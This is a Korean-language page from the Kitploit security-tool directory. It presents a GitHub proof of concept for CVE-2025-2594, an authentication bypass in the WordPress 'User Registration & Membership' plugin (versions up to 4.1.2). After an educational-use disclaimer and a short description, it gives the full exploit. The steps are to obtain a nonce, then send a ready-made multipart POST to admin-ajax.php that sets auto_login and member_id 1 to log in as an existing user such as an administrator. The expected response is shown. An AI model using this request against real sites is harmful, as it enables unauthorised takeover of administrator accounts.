Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-2594 — User Registration & Membership <= 4.1.2 - 인증 우회 | Kitploit
도구/GitHubGitHub/ubaydev/cve-2025-2594
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHububaydev/cve-2025-2594

CVE-2025-2594

User Registration & Membership <= 4.1.2 - 인증 우회

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-2594

User Registration & Membership <= 4.1.2 - 인증 우회

면책 조항!

이 CVE(Common Vulnerabilities and Exposures) 분석 글에 제시된 정보는 교육 및 정보 제공 목적으로만 제공됩니다. 제공된 세부 정보는 공개적으로 이용 가능한 자료, 연구 및 작성자가 수행한 분석을 기반으로 합니다. 본 내용은 해킹, 악용 또는 시스템에 대한 무단 접근을 포함한 불법 활동을 조장하거나 권장하기 위한 것이 아닙니다.

작성자는 제시된 정보의 오용에 대해 어떠한 책임도 지지 않습니다. 개인과 조직은 적용 가능한 법률 및 규정을 준수하여 이 지식을 책임감 있게 적용하는 것이 권장됩니다. 독자들은 반드시 적절한 권한을 받은 통제된 환경에서만 취약점을 테스트할 것을 강력히 권고합니다.

본 분석 글의 작성자와 기여자들은 악의적인 활동을 지지하거나 옹호하지 않으며, 책임 있는 공개 및 윤리적 해킹 관행을 장려합니다.


설명

"User Registration & Membership" WordPress 플러그인에서 심각한 보안 취약점이 발견되었습니다. 이 플러그인은 멤버십 웹사이트와 등록 양식을 만드는 데 널리 사용되는 도구입니다. CVE-2025-2594로 식별된 이 결함은 CVSS 점수 8.1로 높은 심각도를 나타냅니다.

WordPress용 User Registration & Membership 플러그인은 버전 4.1.2까지(포함) 인증 우회에 취약합니다. 이는 'confirm_payment()' 함수의 잘못된 인증 때문입니다. 이로 인해 인증되지 않은 공격자가 사이트의 기존 사용자(관리자 포함)로 로그인할 수 있습니다. 단, 다음 조건이 필요합니다:

  1. 플러그인에 멤버십 애드온이 활성화되어 있어야 함

PoC (Proof Of Concept)

  1. 등록 페이지에서 _confirm_payment_nonce를 획득합니다.
  2. 샘플 요청 데이터
    root@kitploit:~
    POST /wp-admin/admin-ajax.php HTTP/1.1
    User-Agent: PostmanRuntime/7.43.3
    Accept: */*
    Postman-Token: b41b34c8-c1c9-4e3a-aa4f-380706626e7a
    Host: hackthebox.test
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=--------------------------705549092016875046023302
    Content-Length: 565
    
    ----------------------------705549092016875046023302
    Content-Disposition: form-data; name="action"
    
    user_registration_membership_confirm_payment
    ----------------------------705549092016875046023302
    Content-Disposition: form-data; name="security"
    
    CONFIRM_PAYMENT_NONCE
    ----------------------------705549092016875046023302
    Content-Disposition: form-data; name="form_response"
    
    { "auto_login": true }
    ----------------------------705549092016875046023302
    Content-Disposition: form-data; name="member_id"
    
    1
    ----------------------------705549092016875046023302--
    
  3. 응답은 다음과 같아야 합니다.
    root@kitploit:~
    {"success":true,"data":{"message":null}}
    
  4. 샘플 응답 Screenshot 14

참고

  1. https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-412-authentication-bypass
  2. https://plugins.trac.wordpress.org/browser/user-registration/tags/4.1.1/modules/membership/includes/AJAX.php#L566
  3. https://plugins.trac.wordpress.org/changeset/3262077/user-registration/trunk/modules/membership/includes/AJAX.php
  4. https://plugins.trac.wordpress.org/changeset/3262077/user-registration/trunk/modules/membership/includes/Admin/Services/MembersService.php

감사합니다

  • https://saweria.co/ubaii
  • https://buymeacoffee.com/ubaii
  • https://trakteer.id/ubaii
도구 다운로드